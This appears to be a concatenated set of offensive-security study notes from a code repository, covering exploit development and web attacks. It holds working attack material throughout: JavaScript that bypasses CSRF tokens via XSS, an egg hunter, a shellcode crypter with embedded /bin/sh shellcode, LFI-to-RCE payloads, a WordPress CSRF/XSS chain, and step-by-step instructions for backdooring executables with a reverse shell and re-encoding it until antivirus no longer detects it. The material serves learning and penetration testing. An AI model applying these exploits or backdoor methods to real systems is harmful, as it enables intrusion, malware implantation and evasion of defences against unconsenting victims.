| 50 | Once the form data has loaded, we extract the csrf tokens value. 51 | el.querySelector('input[name="csrf_token"]').value); 52 | 53 | We can now pass our arbitrary data with the previously extracted valid csrf token. 54 | request('csrf.php', 'POST', postListener, 'csrf_token=' + el.querySelector('input[name="csrf_token"]').value + '&update_profile=value'); 55 | 56 | 57 | 58 | 59 | A full code listing which exploits the 3 required steps to bypass csrf protection via xss is posted below: 60 | 61 | 62 | function request(url, type, callback, send){ 63 | var oReq = new XMLHttpRequest(); 64 | oReq.open(type, url, true); 65 | oReq.setRequestHeader('Content-type', 'application/x-www-form-urlencoded'); 66 | oReq.onload = callback; 67 | oReq.send(send); 68 | }; 69 | function getListener () { 70 | var el = document.createElement('div'); 71 | el.innerHTML = this.responseText; 72 | request('csrf.php', 'POST', postListener, 'csrf_token=' + el.querySelector('input[name="csrf_token"]').value + '&update_profile=value'); 73 | }; 74 | function postListener(){ 75 | console.log(this.responseText) 76 | }; 77 | request('csrf.php', 'GET', getListener); 78 | -------------------------------------------------------------------------------- /SLAE Assignment 3–Egg Hunter: -------------------------------------------------------------------------------- 1 | Source: https://h0mbre.github.io/SLAE_Egg_Hunter/# 2 | 3 | The first thing we want to do is store our ‘egg’ in a register. 4 | 5 | mov ebx, 0x50905090 6 | 7 | Next we will clear the ecx, eax, and edx registers. 8 | The opcode mul will multiply its operand against the eax register and store the result in eax and edx, 9 | so in this case it’s being multiplied by 0 and storing 0 in both eax and edx. 10 | This saves us a line of code. 11 | How MUL works: https://c9x.me/x86/html/file_module_x86_id_210.html 12 | 13 | xor ecx, ecx 14 | mul ecx 15 | 16 | First Function, page_forward: 17 | 18 | The first function we build into the code will be to increment 1 page in the event that 19 | we hit a page that is inaccessible to us (al = 0xf2). 20 | 21 | By using a bitwise logical or, we’re able to make sure we increment by multiples of 4095 ensuring 22 | that we don’t skip a page. 23 | 24 | page_forward: 25 | or dx, 0xfff 26 | 27 | 28 | Second Function, address_check: 29 | 30 | Next we need to increment edx by one to get us to a nice multiple of 4096. 31 | We will also push our register values onto the stack with pushad in order to preserve them as we make syscalls. 32 | 33 | We will then satisfy the const char *pathname argument for the access syscall in ebx by loading 34 | the effective address of [edx]+4. This will check to see if these bytes are readable to us. 35 | 36 | The [edx] is new for us, I believe. The brackets just mean to go to that address in memory. 37 | In our code, we’re going to the location in memory of edx then moving forward 4 additional bytes, 38 | and then loading that address into ebx with the lea opcode. 39 | LEA OPCODE: https://c9x.me/x86/html/file_module_x86_id_153.html 40 | 41 | address_check: 42 | inc edx 43 | pushad 44 | lea ebx, [edx +4] 45 | mov al, 0x21 46 | int 0x80 47 | 48 | 49 | Compare Op Code 50 | https://c9x.me/x86/html/file_module_x86_id_35.html 51 | 52 | The compare CMP opcode takes two operands and subtracts them, 53 | if the result is a 0 the zero-flag is set and you know that the two operands are equal. 54 | 55 | We will compare the return code of the accept and restore the registers by popping them off of the stack 56 | since we’re done with the syscall. 57 | If al is the same as 0xf2, then we know we got an EFAULT and this page of memory is 58 | inaccessible to us and we JMP to our page_forward function to skip to the next page 59 | 60 | If the memory page is readable to us, we will compare the value of what is stored at edx with ebx which holds our egg. If it does not match, we will JMP to our address_check function and keep reading through the page. 61 | 62 | If the value of what is stored at edx matches our egg, then we have to see if [edx]+4 also does so that we satisfy our double-egg requirement. If it is only found once, then it’s probably just our egg-hunter finding itself. 63 | 64 | Finally, both CMP calls result in zeros then we tell the code to JMP to edx which will execute the code stored there (our real payload). 65 | 66 | 67 | cmp al, 0xf2 68 | popad 69 | jz page_forward 70 | 71 | cmp [edx], ebx 72 | jnz address_check 73 | 74 | cmp [edx+4], ebx 75 | jnz address_check 76 | 77 | jmp edx 78 | -------------------------------------------------------------------------------- /Bypass-AntiVirus/SLAE-Custom Encoder–7: -------------------------------------------------------------------------------- 1 | https://xavibel.com/2019/05/13/shellcoding-linux-x86-custom-crypter-assignment-7/ 2 | 3 | 4 | At this point I had to write 2 files: 5 | 6 | A crypter: With a cypher key and an IV it has to encrypt the original shellcode. 7 | A decrypter: It has to decrypt the shellcode using the cypher key and the IV and has to save it in memory and execute it. 8 | 9 | Let’s start for the crypter. To be able to encrypt the original shellcode we need to have blocks of 8 bytes. The first thing that I do, is calculate the length of the shellcode and divide it by 8 and see if it needs some padding. If it needs it, I add the necessary nops 0x90 at the end of the string. 10 | 11 | # Padding 12 | rem = scd_len / 8 13 | if rem == 0: 14 | print ('[+] Shellcode is multiple of 8. No padding needed') 15 | else: 16 | print ('[+] Shellcode is not multiple of 8. Paddind needed') 17 | block_number = round(scd_len / 8) +1 18 | print ('[+] Number of blocks needed: %d' % block_number) 19 | padding = 8 * block_number - scd_len 20 | print ('[+] Padding needed: %d' % padding) 21 | scd = scd + b'\x90'*padding 22 | 23 | 24 | Now, that our string its a multiple of 8 we can start encrypting it, we have to setup de cypher key and the IV values: 25 | 26 | cipher = blowfish.Cipher(b"xavi") 27 | iv = b'88888888' 28 | 29 | And finally do the encryption: 30 | 31 | data_encrypted = b"".join(cipher.encrypt_cbc(data, iv)) 32 | print ('[+] Blowfish encryption finished:') 33 | print (data_encrypted) 34 | 35 | This is the final crypter code: 36 | 37 | # Author: Xavi Beltran 38 | # Date: 13/05/2019 39 | 40 | # Modules 41 | import blowfish 42 | 43 | # Shellcode 44 | scd = b'\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x89\xe2\x53\x89\xe1\xb0\x0b\xcd\x80' 45 | scd_len = len(scd) 46 | print ('[+] Shellcode length is %d' % scd_len) 47 | 48 | # Padding 49 | rem = scd_len / 8 50 | if rem == 0: 51 | print ('[+] Shellcode is multiple of 8. No padding needed') 52 | else: 53 | print ('[+] Shellcode is not multiple of 8. Paddind needed') 54 | block_number = round(scd_len / 8) +1 55 | print ('[+] Number of blocks needed: %d' % block_number) 56 | padding = 8 * block_number - scd_len 57 | print ('[+] Padding needed: %d' % padding) 58 | scd = scd + b'\x90'*padding 59 | 60 | 61 | cipher = blowfish.Cipher(b"xavi") 62 | data = scd 63 | iv = b'88888888' 64 | data_encrypted = b"".join(cipher.encrypt_cbc(data, iv)) 65 | print ('[+] Blowfish encryption finished:') 66 | print (data_encrypted) 67 | 68 | -------------------------------------------------------------------------------------------------- 69 | -------------------------------------------------------------------------------------------------- 70 | 71 | Our crypter it’s already working. Now I need to code the decrypter, the first step is to decrypt the string and to recover our original shellcode. To do that, we are going to use the same python library. 72 | 73 | 74 | # Shellcode encrypted 75 | enc_scd = b'\x1fp\x8bq\x0e\xc2\x11|p\x83\x05\x9d\xf4\xc4Y\xf5\x16s\xf5:|+\xc5)\tqV\x84\xbe\xe8X\xc5' 76 | 77 | # Decrypt process 78 | cipher = blowfish.Cipher(b"xavi") 79 | data_encrypted = enc_scd 80 | iv = b'88888888' 81 | data_decrypted = b"".join(cipher.decrypt_cbc(data_encrypted, iv)) 82 | print ('[+] Blowfish decryption finished:') 83 | print (data_decrypted) 84 | 85 | NOT DONE 86 | -------------------------------------------------------------------------------- /ASLR/HowToBypass ASLR Corelean.be: -------------------------------------------------------------------------------- 1 | Source: https://www.corelan.be/index.php/2009/09/21/exploit-writing-tutorial-part-6-bypassing-stack-cookies-safeseh-hw-dep-and-aslr/ 2 | 3 | You can manually change the dynamicbase bit in a compiled library to make it ASLR aware 4 | (set 0×40 DllCharacteristics in the PE Header 5 | – you can use a tool such as PE Explorer to open the library & see 6 | if this DllCharacteristics field contains 0x40 in order to determine whether it is ASLR aware or not). 7 | 8 | ------------------------------------------------------- 9 | ------------------------------------------------------- 10 | ------------------------------------------------------- 11 | Bypassing ASLR : partial EIP overwrite 12 | 13 | 14 | ASLR will randomize only part of the address. 15 | only the high order bytes of an address are randomized. 16 | 17 | When an address is saved in memory, take for example 0x12345678, it is stored like this : 18 | LOW HIGH 19 | 87 65 43 21 20 | 21 | When ASLR is enabled, Only “43” and “21” would be randomized. 22 | Under certain circumstances, this could allow a hacker to exploit / trigger arbitrary code execution. 23 | 24 | Scenario: 25 | 26 | Gpt EIP? The original saved EIP is placed on the stack by the operating system. 27 | 28 | If ASLR is enabled, the correct ASLR randomized address will be placed on the stack. 29 | Let’s say saved EIP is 0x12345678 30 | 31 | (where 0x1234 is the randomized part of the address, and 5678 points to the actual saved EIP). 32 | 33 | What if we could find some interesting code (such as jump esp, or something else useful) in the addres space 0x1234XXXX 34 | (where 1234 is randomized, 35 | 36 | 37 | The only thing we could do is try to find something that will do a 38 | jmp edx or push ebp/ret inside the address range of 0x011eXXXX – 39 | which is the saved EIP before the BOF occurs), 40 | and then only overwrite the 2 low bytes of saved EIP instead of overwriting saved EIP entirely. 41 | In this example, no such instruction exists. 42 | 43 | There is a second issue with this example. Even if a usable instruction like that exists, 44 | ou would notice that overwriting the 2 low bytes would not work because when you overwrite the 2 low bytes, 45 | a string terminator (00 – null bytes) are added, 46 | overwriting half of the high bytes as well… 47 | So the exploit would only work if you can find an address that will do the jmp edx/… in the address space 0x011e00XX. 48 | And that limits us to a maximum of 255 addresses in the 0x011e range 49 | 50 | ------------------------------------------------------- 51 | ------------------------------------------------------- 52 | ------------------------------------------------------- 53 | Bypassing ASLR : using an address from a non-ASLR enabled module 54 | 55 | A second technique that can be used to bypass ASLR is to find a module that does not randomize addresses. 56 | 57 | 58 | Bypass ASLR (direct RET overwrite) 59 | 60 | In case of a direct RET overwrite, we overwrite EIP after offset 260 , 61 | and a jmp esp (or call esp or push esp/ret) would do the trick. 62 | 63 | 64 | ASLR Bypass : SEH based exploits 65 | 66 | Find modules that are not aslr protected, find an address that does what you want it to do, and sploit… 67 | Let’s pretend that we need to bypass safeseh as well, for the phun of it. 68 | 69 | Modules without safeseh : (!pvefindaddr nosafeseh) 70 | Modules without safeseh and not ASLR aware : (!pvefindaddr nosafesehaslr) 71 | 72 | So a pop pop ret from any of these modules (or, alternatively, a jmp/call dword[reg+nn] would work too) 73 | -------------------------------------------------------------------------------- /WebExploitation/LFI/LFI-RCEviaPHPSessions: -------------------------------------------------------------------------------- 1 | Source: https://www.rcesecurity.com/2017/08/from-lfi-to-rce-via-php-sessions/ 2 | 3 | A Simple Local File Inclusion Vulnerability 4 | 5 | 6 | The vulnerable web application basically required some form of authentication before giving access to an 7 | administrative upload interface. 8 | However the application did also use one smelly parameter called “lang” to specify the language for its UI: 9 | 10 | login=1&user=admin&pass=admin&lang=en_us.php 11 | 12 | So this was quite obvious to exploit - at the very first glance - you only had to use path traversal sequences: 13 | login=1&user=admin&pass=admin&lang=../../../../../../../../../../etc/passwd 14 | 15 | This simply fetched the /etc/passwd file and echoed it back in the HTTP response. 16 | 17 | 18 | Some common ways of upgrading from LFI to RCE 19 | 20 | So there’s a variety of different tricks to turn your LFI into RCE, just like: 21 | 22 | - Using file upload forms/functions 23 | - Using the PHP wrapper expect://command 24 | - Using the PHP wrapper php://file 25 | - Using the PHP wrapper php://filter 26 | - Using PHP input:// stream 27 | - Using data://text/plain;base64,command 28 | - Using /proc/self/environ 29 | - Using /proc/self/fd 30 | - Using log files with controllable input like: 31 | + /var/log/apache/access.log 32 | + /var/log/apache/error.log 33 | + /var/log/vsftpd.log 34 | + /var/log/sshd.log 35 | + /var/log/mail 36 | 37 | 38 | In this case, any of the above mentioned ways was silently failing with the application just returning its normal 39 | “authentication failed” response. 40 | 41 | --------------------------------------- 42 | RCE Using Control over PHP Session Values 43 | 44 | When trying to authenticate with invalid credentials such as admin/admin: 45 | 46 | The application issued a couple of Set-Cookie instructions like the following, 47 | which strongly indicates that the values from the authentication requests might be 48 | stored within the PHP session on the server side: 49 | 50 | Set-Cookie: PHPSESSID=i56kgbsq9rm8ndg3qbarhsbm27; path=/ 51 | Set-Cookie: user=admin; expires=Mon, 13-Aug-2018 20:21:29 GMT; path=/; httponly 52 | Set-Cookie: pass=admin; expires=Mon, 13-Aug-2018 20:21:29 GMT; path=/; httponly 53 | 54 | As you might know PHP5 stores it’s session files by default under /var/lib/php5/sess_[PHPSESSID] 55 | - so the above issued session “i56kgbsq9rm8ndg3qbarhsbm27” would be stored under 56 | /var/lib/php5/sess_i56kgbsq9rm8ndg3qbarhsbm27. 57 | 58 | When having a look at the session file itself using the previously discovered LFI vulnerability: 59 | login=1&user=admin&pass=admin&lang=/../../../../../../../../../var/lib/php5/sess_i56kgbsq9rm8ndg3qbarhsbm27 60 | 61 | indicators even got stronger: 62 | user_ip|s:0:"";loggedin|s:0:"";lang|s:9:"en_us.php";win_lin|s:0:"";user|s:6:"admin";pass|s:6:"admin"; 63 | 64 | So as a consequence out of this, using some arbitrary PHP code as the username: 65 | 66 | login=1&user=&pass=password&lang=en_us.php 67 | 68 | Resulted in an arbitrary value being set in the Set-Cookie directive (and therefore in the session file): 69 | Set-Cookie: user=%3C%3Fphp+system%28%22cat+%2Fetc%2Fpasswd%22%29%3B%3F%3E; expires=Mon, 13-Aug-2018 20:40:53 GMT; path=/; httponly 70 | 71 | The session file could again afterwards be included using the LFI (note that you need to remove the cookie from the request, otherwise it would get overwritten again and the payload would fail): 72 | login=1&user=admin&pass=password&lang=/../../../../../../../../../var/lib/php5/sess_i56kgbsq9rm8ndg3qbarhsbm27 73 | 74 | Which resulted in the final Remote Code Execution. 75 | 76 | 77 | 78 | -------------------------------------------------------------------------------- /backdoorPE/Extreme-Backdoor-PE: -------------------------------------------------------------------------------- 1 | Let's focus on code caves: 2 | 3 | 1) Find a section that gives me enough space to enter backdoor code 4 | + Use a tool like Cave Miner or something to do this. 5 | + Make sure Executable and Writable permissions are enabled on this. 6 | 7 | Let's say we're backdooring a program that has user interaction as "Login here: " 8 | 9 | 2) find the string 10 | 11 | 3) Note the instructions in that area. and remember to note the next instruction address. 12 | 13 | 3) Change the instruction to JMP to your code cave 14 | 15 | 4) Save the state of the registeres prior to calling the shellcode {Make sure AD is first} 16 | pushad 17 | pushfd 18 | 19 | 5) Execute the instructions above and note the value of ESP. We'll use this to realign our stack later. 20 | 21 | 6) Generate reverse shell using msfvenom 22 | 23 | 7) 24 | - Normally reverse TCP shellcode tries to connect to the handler given number of times. 25 | if the connection fails it closes the process by calling a ExitProcess API call. 26 | 27 | The problem is if the connection handler fails, the executution of the applciation will stop, 28 | changing a few lines of the shellcodes assembly now will make it to where whenever the connection fails: 29 | + shellcode will still retry to connect to the handler 30 | + size of the shellcode is decreased! 31 | 32 | To fix this, make necessary changes inside assembly code. 33 | Original categories: 34 | - try_connect: 35 | - handle_failure: 36 | - failure: 37 | - connected: 38 | New assembly code: 39 | - try_connect: 40 | - connected: 41 | 42 | 8) Compile this with nasm -f bin stager_reverse_tcp_nx.asm 43 | 44 | Although the TCP shellcode is ready to use, it will not be placed directly. 45 | The goal is executing the shellcode on a new thread. 46 | In order to create a new thread instance, there needs to be another shellcode that makes a CreateThread API call 47 | that is pointing to reverse TCP shellcode. 48 | 49 | You can use https://github.com/rapid7/metasploit-framework/blob/master/external/source/shellcode/windows/x86/src/single/createthread.asm 50 | 51 | - Why? 52 | - It has to do with synchronous vs. asynchronous communications. 53 | - If you are embedding a reverse shell in an executable, you are going to freeze up that process 54 | while your shell has a connection. Not too stealthy when you try to open notepad and 55 | it hangs while the hacker is planting things on your system. 56 | - Creating the new thread allows the current hi-jacked system to continue while the nefarious stuff 57 | continues elsewhere. 58 | 59 | 60 | 9) Place your shellcode inside createthread.asm file in hex format. 61 | 62 | 10) Assemble it: nasm -f bin createthread.asm 63 | 64 | Now our shellcode is ready to be inserted into our executable. 65 | BEFORE! we do that, remember to encode your shellcode to bypass the static/signature analysis mechanism of AV products. 66 | 67 | 11) encode your shellcode. 68 | 69 | - Tip: 70 | After each encoding process uploading the encoded shellcode to virus total in 71 | raw format and checking the detection score is suggested. 72 | Try every combination until it gets undetected. 73 | 74 | 12) Print the encoded createthread shellcode in hex format using: xxd -ps createthread 75 | - OR: Open the shellcode with a hex editor and copy the hex values. 76 | 77 | 13) Paste your encoded createthread shellcode in hex format. 78 | 79 | 14) Align the stack: 80 | Old ESP - New ESP = 0xXX 81 | ADD ESP, 0xXX 82 | 83 | 15) Restore the register values we saved prior to executing our shellcode: (IN THIS ORDER) 84 | popfd 85 | popad 86 | 87 | 16) Enter the instruction that you ovewrote for this hijack. 88 | 89 | 17) Return back to the function that redirected the execution to the cave with inserting JMP < > instruction. 90 | 91 | 18) Using PE Editor, you can preserve authenticity of the file by fixing the final file checksum. 92 | + Basic PE Header Information 93 | - Checksum: 94 | 95 | 96 | Source: https://pentest.blog/art-of-anti-detection-2-pe-backdoor-manufacturing/ 97 | -------------------------------------------------------------------------------- /Exploiting-Cisco-Routers/TCP Session Hijacking: -------------------------------------------------------------------------------- 1 | Source https://www.exploit-db.com/papers/13587 2 | 3 | At the establishment of a TCP session the client starts by 4 | sending a SYN-packet (SYN=synchronize) with an sequence number. 5 | 6 | To hijack a session it is required to send a packet with a right 7 | seq-number, otherwise they are dropped. You have two options to get 8 | the right seq-number. 9 | 10 | 11 | Option A: 12 | You try to guess the right number. It is made up of 32bit 13 | so you _just_ have 4294967296 possibilities, good luck! 14 | 15 | Option B: 16 | You sniff the existing connection, this works at networks 17 | which use Hub's without problems, but to do this at a switched 18 | network you have one way: 19 | Man-in-the-Middle! 20 | 21 | 22 | -------=[ 0x02b - Man-in-the-Middle 23 | 24 | To get Man-in-the-Middle we use ARP Poison Routing. 25 | 26 | In order to sniff the connection between two hosts the attacker 27 | sends a manipulated ARP packet to one of the hosts which contains 28 | the IP of the second host and the MAC of the attacker. So this host 29 | sends every packet that is meant for the second host to the attacker. 30 | The same is done with the other host, the attacker himself just 31 | forwards the packets, so he acts as an invisible intermediary, as 32 | Man-in-the-Middle. 33 | 34 | +------+ +------+ 35 | |HOST-A| -------------------SWITCH------------------ |HOST-B| 36 | +------+ ................. | ................. +------+ 37 | : | : 38 | : | : 39 | : | : 40 | : | : 41 | +--------+ 42 | Hello [A], I am [B] > |ATTACKER| < Hello [B], I am [A] 43 | +--------+ 44 | 45 | 46 | -------=[ 0x02c - Session Hijack 47 | 48 | Vulnerable to hijacking is every unencrypted connection. 49 | We start with the Man-in-the-Middle attack between the victim 50 | and the server, if the server is in another subnet we attack 51 | the gateway instead of the server. If everything is successful 52 | we are able to observe every single packet with a sniffer. 53 | 54 | To hijack the session we wait for a packet and use the infos 55 | from it: source IP, destination IP, source port, destination port, 56 | and the sequence number. With this data we create a own packet 57 | and send it instantly to the server. The server accepts it and 58 | increases the expected seq-number for the next one. As soon the 59 | next packet from the real client arrives the server drops it as 60 | outdated, so the client is desynchronized and loses the connection. 61 | 62 | 63 | -------=[ 0x03a - Tools 64 | 65 | There are many programs which do the complete thing by 66 | itself (Hunt, Juggernaut, T-Sight), but I got some problems 67 | with some of them. 68 | 69 | For the Man-in-the-Middle attack I will use the well known 70 | program "Ettercap". "Wireshark" does the sniffing for me 71 | and the hijack is done with "Shijack", everything of course 72 | on a Linux/GNU box. 73 | 74 | Shijack: http://packetstormsecurity.org/sniffers/shijack.tgz 75 | 76 | 77 | 78 | 79 | 80 | 81 | -------=[ 0x03b - Scenario 82 | 83 | We aim to hijack a telnet session between a client 84 | and a server. 85 | 86 | Network: 87 | 88 | +--------+ +--------+ 89 | | SERVER | <.......T..E..L..N..E..T......> | CLIENT | 90 | |10.0.0.1| --------------+ +--------------|10.0.0.2| 91 | +--------+ | | +--------+ 92 | | | 93 | +------+ 94 | |SWITCH| 95 | +------+ 96 | | 97 | | 98 | +--------+ 99 | |ATTACKER| 100 | |10.0.0.3| 101 | +--------+ 102 | 103 | -------------------------------------------------------------------------------- /socketReuse/recv: -------------------------------------------------------------------------------- 1 | recv function: 2 | https://docs.microsoft.com/en-us/windows/win32/api/winsock/nf-winsock-recv 3 | 4 | SOCKET s, --> Socket file descriptor 5 | char *buf --> Pointer to the payload for this recv function. 6 | int len --> length of the payload we're sending 7 | int flags --> integerer for flags 8 | 9 | We will need all of these in order to reuse/make a 2nd call to ws2_32.recv. 10 | ---------------- 11 | ---------------- 12 | 13 | We want to reuse the socket file descriptor for vulnserver. 14 | 15 | 1) Restart vulnserver, you'll be at the program entry point, and just scroll to see calls to ws32. 16 | - This could be any of them, accept, send, receive, etc. 17 | 18 | 2) Note the address down. 19 | Example: 00401953 CALL | recv 20 | 21 | Now see from the MSDN, on vulnserver, we want to see what these variables look like during a normal operation 22 | Of this binary 23 | 24 | 3) Set a breakpoint at recv, and then telnet into it. 25 | 26 | We hit our breakpoint, and if we look at the stack we see what the recv syntax is! 27 | - Socket - 84 --> Socket file descriptor of 84. 28 | - Buffer = 003E4A80 --> Buffer destination pointer 29 | - BufSize = 1000 (4096.) --> Buffer length of 4,096 bytes. 30 | - Flags = 0 31 | 32 | 4) Note all of this down. 33 | 34 | We need push these arguments to the call in reverse order, then push them onto the stack, then make the call to recv. 35 | 36 | 5) Task 1, push 0 onto the stack (Flags) 37 | XOR EAX, EAX 38 | PUSH EAX 39 | 40 | 6) Task 2, Push the length of our input: (1000, this is enough space for our reverse shell) 41 | XOR EAX, EAX 42 | ADD AH, 10 43 | PUSH EAX 44 | 45 | Task 3, Push the buffer descriptor pointer. 46 | We will likely need to find out where the buffer is stored, or if we can create a new one. 47 | In this case, we'll need to reference the old one. 48 | - I'm not sure when we should be doing one over the other. 49 | 50 | Look at the stack, set an address as the new buffer, and then reuse the socket descriptor from earlier. 51 | 52 | 7) We need to adjust the stack pointer, we can place that into EAX for us to do so. 53 | PUSH ESP 54 | POP EAX 55 | 56 | 8) We need adjust where we want ESP to go, we can do this in eax. 57 | - Where is ESP pointing to now? (A) Example: 00B8FA04 58 | - Where do we want it to point to? (B) Example: 00B8FA1C 59 | Calculate the space between these two memories: 60 | 24 bytes, 0x18 hex. 61 | PUSH EAX 62 | 63 | This will make the destination buffer for the next recv at the end of our small buffer of C's. 64 | 65 | Now we need a socket description. 66 | 67 | Socket descriptor might not be the same every time the program runs, this could change, and could be affected by ASLR. 68 | So we want a dynamic way to figure out what we want this socket descriptor is. 69 | 70 | 9.a) Figure out where the old one was. Figure this out by guessing and scrolling. 71 | We're looking for the old socket descriptor which we know had the value 84. 72 | Found in, in the stack it shows 00000084 73 | Calculate the distance between what's currently in EAX, and where the old socket descriptor you found is. 74 | Turn that into assembly 75 | 76 | OR INSTEAD OF #9.a: 77 | 78 | 9.b) If the socket descriptor is already stored in the registers (for example this is in EBX), just push it. 79 | PUSH EBX 80 | 81 | Now we need to find the actual call to recv, which the call at the address we saw is not the real call. 82 | We have to actually follow the jump. 83 | 84 | 11) Set a breakpoint at our CALL as we found in #2. 85 | 12) Telnet into vulnserver 86 | 87 | 13) Click F7, this is where the actuall call to recv is located. 88 | 89 | 14) Copy this address 90 | Example: 0040252C | JMP DWORD PTR DS:[<&W32_32.recv>[ | ws2_32.recv 91 | 92 | 15) Trial run: 93 | Run through your code and make sure all of the arguments for recv are passed onto the stack correctly. 94 | 95 | 16) We need to find a way to pass a call instruction to the address that we found for recv (#14) 96 | Problem! This address starts with a null byte. 97 | We're going to load tthe first 3 bytes into a register, 98 | then we're going to perform a shift right on this. 99 | 100 | We can do 40252C + some random values after, so when it shifts right it won't matter. 101 | 102 | XOR EAX, EAX 103 | add eax, 40252C90 104 | shr eax, 0x8 105 | 106 | As you see, now the call to recv is in EAX. 107 | 108 | 17) call eax 109 | 110 | -------------------------------------------------------------------------------- /Jumping-to-Shellcode: -------------------------------------------------------------------------------- 1 | Source: https://www.abatchy.com/2017/05/jumping-to-shellcode.html 2 | 3 | --------------------------------------------------------------------------------------------------- 4 | --------------------------------------------------------------------------------------------------- 5 | 6 | 1. JMP/CALL register 7 | 8 | Conditions: 9 | - A register points to shellcode. 10 | Example: 11 | 12 | [Register] → [Shellcode] 13 | EIP → JMP/CALL [register] 14 | EIP now points to [register] where shellcode. 15 | 16 | 17 | --------------------------------------------------------------------------------------------------- 18 | --------------------------------------------------------------------------------------------------- 19 | 20 | 2. POP RET / POP POP RET / POP POP POP RET 21 | 22 | Condition: 23 | - Address at [ESP+4], [ESP+8], [ESP+12] (and so on) points to address to shellcode OR directly to shellcode. 24 | 25 | Example 1: 26 | 27 | [ESP] → [4 bytes][Address to shellcode]. 28 | EIP → POP [register] followed by RET. 29 | POP [register]: ESP now points to old_ESP + 4 30 | RET: EIP now contains address to shellcode. 31 | EIP now points to shellcode. 32 | 33 | Example 2: 34 | 35 | [ESP] → [8 bytes][Address to JMP ESP][shellcode]. 36 | EIP → POP [register] followed by POP [register] followed by RET: 37 | POP [register], POP [register] will get rid of 8 bytes, new ESP → old ESP + 8 (Address to JMP ESP) 38 | RET places address to JMP ESP in EIP and now ESP now points to shellcode. 39 | JMP ESP: EIP now contains ESP 40 | EIP points to current ESP value which points to start of shellcode. 41 | --------------------------------------------------------------------------------------------------- 42 | --------------------------------------------------------------------------------------------------- 43 | 44 | 3. PUSH RET 45 | 46 | Condition: 47 | - A register points to shellcode and can’t/don’t want to use method 1. 48 | 49 | Example: 50 | 51 | [Register] → [Shellcode] 52 | EIP → PUSH [register], followed by RET 53 | Stack will first push register, then pop it to EIP. 54 | EIP now points to shellcode. 55 | Pros: 56 | --------------------------------------------------------------------------------------------------- 57 | --------------------------------------------------------------------------------------------------- 58 | 59 | 4. JMP [register + offset] 60 | 61 | Condition: 62 | - A register + offset points to shellcode. 63 | 64 | Example: 65 | 66 | [Register] → [Shellcode] 67 | EIP → JMP [register + offset] 68 | EIP will point to [register + offset] where the shellcode starts. 69 | --------------------------------------------------------------------------------------------------- 70 | --------------------------------------------------------------------------------------------------- 71 | 72 | 5. Blind return 73 | 74 | 5. Blind return 75 | Condition: 76 | - Shellcode is always loaded to the same address. 77 | - Address doesn’t contain a null byte. 78 | - You control at least the first 4 bytes at [ESP] 79 | 80 | Example: 81 | 82 | Shellcode is always at 0xdeadbeef 83 | Since you control the first 4 bytes at ESP, put 0xdeadbeef at ESP. 84 | By pointing EIP to a RET, address at ESP will be popped to EIP. 85 | EIP now points to address 0xdeadbeef where the shellcode starts. 86 | --------------------------------------------------------------------------------------------------- 87 | --------------------------------------------------------------------------------------------------- 88 | 89 | 6. POPAD 90 | 91 | Condition: 92 | - Shellcode is located at [ESP + 32x + offset] 93 | - Enough controllable space to execute POPAD y times then JMP ESP. 94 | 95 | Example: 96 | 97 | [ESP + 240] → [Shellcode] 98 | [ESP + 32 * 7] → [NOP sled] 99 | [ESP] → POPAD 7 times followed by JMP ESP` 100 | EIP → [JMP ESP] 101 | EIP will execute POPAD 7 times, ESP = old_ESP + 224 102 | EIP goes over NOP sled 103 | EIP after executing NOP sled, it will point to [ESP + 240] where the shellcode starts. 104 | 105 | --------------------------------------------------------------------------------------------------- 106 | --------------------------------------------------------------------------------------------------- 107 | 108 | 7. Short jumps (backwards, forwards, conditional) 109 | 110 | Condition: 111 | - Shellcode is located at [ESP + offset] where -128 < offset < 127. 112 | 113 | Example: 114 | 115 | [ESP + 30] → [Shellcode] 116 | [ESP] → JMP 30 117 | EIP → [JMP ESP] 118 | EIP will execute a short JMP 119 | EIP will point to [ESP + 30] where the shellcode starts. 120 | 121 | --------------------------------------------------------------------------------------------------- 122 | --------------------------------------------------------------------------------------------------- 123 | 124 | 8. Hardcoded address 125 | 126 | Condition: 127 | - Shellcode is always located at specific address. 128 | 129 | Example: 130 | 131 | 0xdeadbeef → [shellcode] 132 | EIP → JMP ESP 133 | ESP → JMP 0xdeadbeef 134 | 135 | --------------------------------------------------------------------------------------------------- 136 | --------------------------------------------------------------------------------------------------- 137 | 138 | -------------------------------------------------------------------------------- /WebExploitation/WordPress5.1-XSS+CSRF+RCE: -------------------------------------------------------------------------------- 1 | Source: https://ironhackers.es/en/tutoriales/wordpress-5-1-csrf-xss-rce-poc/ 2 | Video: https://youtu.be/QnOXTcCPD3o 3 | 4 | 5 | 6 | The vulnerability starts in a CSRF so it requires user interaction and javascript enabled in the victim’s browser. 7 | 8 | That is to say that the victim’s browser has the session started and therefore has session cookies, 9 | the attacker generates a page or a malicious script (password change, transfer) that when visited or executed 10 | by the victim will cause it to make the request. 11 | When executed by the victim, the browser will automatically send the session cookies, 12 | performing the operation with the victim’s account. 13 | 14 | 15 | Once a request for a WordPress has been captured under our control, we know what request we have to make a malicious form. 16 | 17 | 18 |
19 | 20 | 21 | 22 |
23 | 25 | 26 | 27 | When the victim loads this html, the form that will create a comment will be sent automatically. 28 | 29 | Wordpress has saneization funcions. 30 | We will bypass this to get an XSS stored 31 | 32 | 33 | The fault was found in a functionality that exists in 34 | /wp-includes/formatting.php that for reasons of SEO performs a different treatment to html tags that have a rel attribute. 35 | 36 | The fault was found in a functionality that exists in /wp-includes/formatting.php that for 37 | reasons of SEO performs a different treatment to html tags that have a rel attribute. 38 | 39 | The problem is that it encapsulates each value of the attribute between double quotes so we could escape from an attribute by putting it inside a double quote. 40 | That is : 41 | 42 | 1 43 | 44 | We would have an associative array {“title” => ‘ironhackers “onclick = alert (0) id =”‘, “rel” => ‘nofollow’}, 45 | when containing rel will be processed as seen in the extract above encapsulating each element of the array in double quotes. 46 | With this the first tag -> title = “ironhackers” onclick = alert (0) With what we would have obtained an XSS. 47 | 48 | 49 | Let’s see it in conjunction with the CSRF. First we must modify our malicious html with the necessary payload. 50 | 51 | 52 | 53 | 54 | 59 |
60 | 61 | 62 | 63 |
